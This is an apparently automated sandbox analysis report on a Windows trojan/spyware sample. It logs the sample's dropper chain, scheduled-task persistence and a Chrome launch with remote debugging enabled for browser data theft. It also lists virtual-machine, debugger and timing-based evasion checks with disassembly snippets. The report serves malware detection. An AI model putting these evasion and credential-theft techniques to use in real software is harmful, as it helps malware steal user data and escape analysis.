Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/6@10/6
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000009.00000002.2844574821.000028F000432000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 00000009.00000002.2846494174.000028F00074C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 63%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe "C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe"
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2912 --field-trial-handle=2744,i,15832663537055450618,8229323892131128527,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: file.exe Static file information: File size 1917952 > 1048576
Source: file.exe Static PE information: Raw size of rvvxjflc is bigger than: 0x100000 < 0x1a2600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.cc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.960000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.960000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.960000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rvvxjflc:EW;jcggrwcz:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: random[1].exe.6.dr Static PE information: real checksum: 0x44e7f8 should be: 0x4522e4
Source: f7fa65d988.exe.6.dr Static PE information: real checksum: 0x44e7f8 should be: 0x4522e4
Source: file.exe Static PE information: real checksum: 0x1e4046 should be: 0x1d7c3e
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1e4046 should be: 0x1d7c3e
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: rvvxjflc
Source: file.exe Static PE information: section name: jcggrwcz
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: rvvxjflc
Source: skotes.exe.0.dr Static PE information: section name: jcggrwcz
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: ozbvvmja
Source: random[1].exe.6.dr Static PE information: section name: ydmfclot
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: f7fa65d988.exe.6.dr Static PE information: section name:
Source: f7fa65d988.exe.6.dr Static PE information: section name: .rsrc
Source: f7fa65d988.exe.6.dr Static PE information: section name: .idata
Source: f7fa65d988.exe.6.dr Static PE information: section name:
Source: f7fa65d988.exe.6.dr Static PE information: section name: ozbvvmja
Source: f7fa65d988.exe.6.dr Static PE information: section name: ydmfclot
Source: f7fa65d988.exe.6.dr Static PE information: section name: .taggant
Source: service123.exe.7.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0097D91C push ecx; ret 6_2_0097D92F
Source: file.exe Static PE information: section name: entropy: 7.983608740333537
Source: file.exe Static PE information: section name: rvvxjflc entropy: 7.95542311892839
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.983608740333537
Source: skotes.exe.0.dr Static PE information: section name: rvvxjflc entropy: 7.95542311892839
Source: random[1].exe.6.dr Static PE information: section name: ozbvvmja entropy: 7.953751777733906
Source: f7fa65d988.exe.6.dr Static PE information: section name: ozbvvmja entropy: 7.953751777733906
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008392001\f7fa65d988.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB0CC second address: EDB0EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4FB8FDD501h 0x0000000c jc 00007F4FB8FDD4F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB0EC second address: EDB109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 je 00007F4FB8D6228Ch 0x0000000c jp 00007F4FB8D62278h 0x00000012 pushad 0x00000013 jl 00007F4FB8D62276h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDB3BE second address: EDB3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8FDD508h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDBB0A second address: EDBB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDBB10 second address: EDBB17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDC4A8 second address: EDC4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4FB8D62276h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDC4B3 second address: EDC504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD504h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 5EA31700h 0x00000010 jmp 00007F4FB8FDD506h 0x00000015 push 93C47211h 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4FB8FDD504h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDD2D3 second address: EDD2E5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4FB8D62276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDD2E5 second address: EDD2EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDD4F0 second address: EDD4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDD6BD second address: EDD6CB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDD6CB second address: EDD6D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDD6D8 second address: EDD6EE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FB8FDD4FAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EDE48D second address: EDE4D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e pop edi 0x0000000f nop 0x00000010 sub dword ptr [ebp+122D2F78h], esi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F4FB8D62278h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov esi, 2D405D54h 0x00000039 movsx edi, dx 0x0000003c push eax 0x0000003d push edi 0x0000003e push esi 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E90790 second address: E90794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE1A3A second address: EE1A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE2EA4 second address: EE2EA9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE4499 second address: EE44B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F4FB8D62278h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F4FB8D62278h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE44B3 second address: EE44BD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4FB8FDD4FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9C400 second address: E9C404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE4D5A second address: EE4D5F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE9986 second address: EE999A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62280h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE999A second address: EE99AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8FDD501h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEAEE0 second address: EEAF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 popad 0x00000009 mov dword ptr [esp], eax 0x0000000c jg 00007F4FB8D6227Ch 0x00000012 and edi, 1FE6BDE7h 0x00000018 push 00000000h 0x0000001a or bl, FFFFFFF9h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007F4FB8D62278h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 and ebx, dword ptr [ebp+124785BCh] 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F4FB8D62287h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEAF3C second address: EEAF42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E9594B second address: E9594F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEE5D1 second address: EEE5D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEE5D7 second address: EEE5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF764 second address: EEF76A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF76A second address: EEF787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D62289h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF787 second address: EEF78B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEE88C second address: EEE890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
